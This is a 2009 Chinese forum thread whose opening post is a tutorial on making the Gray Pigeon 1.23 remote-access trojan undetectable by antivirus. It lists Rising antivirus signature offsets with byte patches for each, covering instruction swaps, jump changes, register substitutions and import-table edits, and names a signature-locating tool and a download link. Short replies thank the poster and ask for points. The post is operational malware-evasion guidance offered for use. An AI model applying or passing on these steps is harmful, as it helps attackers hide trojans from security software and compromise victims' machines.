打造全免杀灰鸽子1

社区服务
高级搜索
猴岛论坛电脑百科打造全免杀灰鸽子1
发帖 回复
正序阅读 最近浏览的帖子最近浏览的版块
4个回复

打造全免杀灰鸽子1

楼层直达
974754042

ZxID:2321902

等级: 少将

举报 只看楼主 使用道具 楼主   发表于: 2009-03-22 0
打造全免杀灰鸽子1
                 打造全免杀远程控制软件


                                    主讲:冰点

                                     QQ:972826


免杀实例,灰鸽子1.23VIP版

第一步,过专杀。

SEVINFO
JFDSKJF

TMAIN_FORM
FDSFS_FSDA

过了专杀,过了金山
搜索 MYCCL使用方法






瑞星特征码:
特征码 物理地址/物理长度 如下:
[特征] 00004DA8_00000001  十六进制添0,是0则写1
[特征] 0003FE22_00000001  十六进制添0,是0则写1
[特征] 00078C23_00000001  十六进制添0,是0则写1
[特征] 0007B7BA_00000001  十六进制添0,是0则写1
[特征] 0007C43F_00000001  十六进制添0,是0则写1
[特征] 0007C590_00000001  十六进制添0,是0则写1
[特征] 00081430_00000001  十六进制添0,是0则写1
[特征] 000822AA_00000001  十六进制添0,是0则写1
[特征] 00083BFE_00000001  十六进制添0,是0则写1
[特征] 00083CE0_00000001  十六进制添0,是0则写1
[特征] 00083CE4_00000001  十六进制添0,是0则写1
[特征] 00087E84_00000001  十六进制添0,是0则写1

[特征] 00087D1E_00000001  0048891E (此处添0无法运行)
0048891B   .  64:FF30       push    dword ptr fs:[eax]
0048891E   .  64:8920       mov     dword ptr fs:[eax], esp


这两句上下互相更换                                                
--------------------------------------------------------------------------
[特征] 0008AECC_00000001  0048BACC (此处添0无法运行)
把push 0该为
push eax
push eax
或者
push edx
push edx
可以正常运行,
但是该为
push ebx
push ebx
或者
push ecx
push ecx
不能正常运行
-------------------------------------------------------------
[特征] 0008B160_00000001  0048BD60 (添0后会弹出灰鸽子安装成功)
把je该为jme
--------------------------------------------------------------
[特征] 0007AE08_00000001  0047BA08 (此处添0无法上线)
跳转法修改
0047C2F5 0区域


mov     eax, dword ptr [48E388]
0047BA08    A1 88E34800     mov     eax, dword ptr [48E388]
0047BA0D    8338 00         cmp     dword ptr [eax], 0
0047BA10    74 11           je      short 0047BA23
0047BA12    A1 88E34800     mov     eax, dword ptr [48E388]
0047BA17    8B00            mov     eax, dword ptr [eax]


[特征] 0008AF9D_00000001  0048BB9D (此处添0无法有效运行)
je该为jle
------------------------------------------------------------------
内存特征码:

[特征] 00079708_00000002  添0,是0则写1
[特征] 0007A4F6_00000002  大小写
[特征] 0007AC12_00000002  大小写
[特征] 00084CCA_00000002  汉字替换

[特征] 00090928_00000002  大小写


[特征] 0009094A_00000002  00494D4A 输入表修改
InternetOpenUrlA


[特征] 0009091A_00000002   00494D1A 输入表修改
ShellExecuteA






0007D6DB                    教程地址http://www.hack4.com/soft/softdown.asp?softid=3307        大哥我找了很久了 加下分吧
郑州富士康招聘www.wpp5.com
♂︶ㄣ葬戀♀.

ZxID:3427344

等级: 元老
CS区招收各种人才,欢迎加入,有意者PM我

举报 只看该作者 4楼  发表于: 2009-03-22 0
不喜欢当黑客```

楼主留言:

呵呵 你想当还不能当呢~不想当 学点防范的吧

974754042

ZxID:2321902

等级: 少将

举报 只看该作者 地板   发表于: 2009-03-22 0
真失望 这么好的教程竟然不加分。。。给点动力好不。。要不以后叫人拿什么发帖啊
郑州富士康招聘www.wpp5.com
网仙

ZxID:2449528

等级: 中将
郁闷ING

举报 只看该作者 板凳   发表于: 2009-03-22 0
谢谢了!

974754042

ZxID:2321902

等级: 少将

举报 只看该作者 沙发   发表于: 2009-03-22 0
大家等下马上出 第2 的
郑州富士康招聘www.wpp5.com
« 返回列表
发帖 回复